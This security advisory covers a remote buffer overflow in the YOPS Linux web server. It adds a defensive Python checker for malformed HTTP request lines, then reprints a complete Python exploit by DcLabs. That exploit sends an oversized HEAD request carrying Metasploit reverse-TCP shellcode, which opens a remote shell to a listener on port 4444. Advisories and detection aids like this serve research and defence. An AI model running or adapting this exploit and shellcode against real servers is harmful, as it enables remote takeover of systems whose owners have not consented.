Security Vulnerability
YOPS Web Server Remote Buffer Overflow Vulnerability

Published: 2010-09-10
Updated: 2010-11-29

Affected systems:
yoopss YOPS <= 2009-11-30

Description:
YOPS (Your Own Personal [WEB] Server) is an HTTP server for the Linux platform implemented in C.

YOPS has a vulnerability in the handling of user requests; a remote attacker could exploit it to execute arbitrary instructions on the server.

In the http_parse_request_header function, the application performs no buffer bounds check on malformed data received via the HTTP commands (HEAD/GET/POST), and then passes that data as the logger variable input of the swebs_record_log function.
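The defect described above is an unbounded copy of the request line. The following check, added here as an illustration and not part of the advisory or of YOPS itself, shows the kind of request-line sanity test a reverse proxy, WAF rule or IDS signature can apply before such data reaches a vulnerable parser: it flags an oversized request-target, non-printable bytes, and bytes trailing the HTTP version, all of which the request shape on this page exhibits. The 512-byte limit and the sample requests are constructed for this example; they are not YOPS's internal buffer sizes.

```python
import re
from typing import Dict, List

# Constructed policy values for this example (not YOPS's buffer size):
# the request on this page pads the request-target to 802 bytes, so a limit
# of 512 separates it from ordinary traffic without flagging long query strings.
MAX_TARGET_LEN = 512
ALLOWED_METHODS = {b"GET", b"HEAD", b"POST"}
PRINTABLE_TOKEN = re.compile(rb"\A[\x21-\x7e]+\Z")   # visible ASCII, no space
HTTP_VERSION = re.compile(rb"\AHTTP/\d\.\d\Z")       # nothing may follow the version


def inspect_request_line(raw: bytes) -> List[str]:
    """Check the request line of a raw HTTP request.

    Returns a list of findings; an empty list means the line is well-formed
    under the limits above. Only the first line is examined, because that is
    the data the advisory says http_parse_request_header hands to the logger.
    """
    findings: List[str] = []
    line = re.split(rb"\r?\n", raw, maxsplit=1)[0]
    parts = line.split(b" ")
    if len(parts) != 3:
        findings.append("request line does not have exactly 3 space-separated fields")
        return findings
    method, target, version = parts
    if method not in ALLOWED_METHODS:
        findings.append(f"unexpected method {method!r}")
    if len(target) > MAX_TARGET_LEN:
        findings.append(f"request-target is {len(target)} bytes, limit {MAX_TARGET_LEN}")
    if not PRINTABLE_TOKEN.match(target):
        findings.append("request-target contains non-printable or non-ASCII bytes")
    elif not (target.startswith(b"/") or target == b"*" or b"://" in target):
        findings.append("request-target is not origin-form, absolute-form or asterisk-form")
    if not HTTP_VERSION.match(version):
        findings.append("version field is not a bare HTTP/x.y token (trailing bytes?)")
    return findings


# Constructed sample requests: one ordinary request, one shaped like the
# warm-up request on this page, and one with the same shape as the page's
# payload (802 filler bytes, a repeated 4-byte value, bytes after the version)
# using neutral filler instead of the original address and shellcode.
SAMPLES: Dict[str, bytes] = {
    "benign": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "dummy": b"HEAD DcLabs HTTP/1.1\r\n\r\n",
    "overflow": (b"HEAD " + b"A" * 802 + b"\x41\x42\x43\x44" * 4
                 + b" HTTP/1.1" + b"\x90" * 6 + b"\r\n\r\n"),
}


def scan_samples() -> Dict[str, List[str]]:
    """Run the request-line check over every constructed sample."""
    return {name: inspect_request_line(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, "->", findings or ["ok"])
```

The length test alone is enough to stop the request shape shown on this page at a proxy; the version-field test is the more general signal, since any request that carries binary data between the HTTP version and the CRLF is not something a browser or a standard client produces.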

<*Source: Rodrigo Escobar <ipax () dclabs ! com ! br> *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Users bear the risk themselves!

Rodrigo Escobar <ipax@dclabs.com.br> provided the following test method:

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
# server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

HOST = "localhost"
PORT = 8888

import socket
import sys
import time

try:
    BUFF_LEN = int(sys.argv[1])
except:
    BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)


buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
        "\xcb" # instruction alignment
        "\xbc\x69\x69\x96\xb0" # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
###            +Exploit+           ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

Recommendation:
Vendor patch:

yoopss
------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://sourceforge.net/projects/yops2009/

This advisory was translated and compiled by NSFOCUS.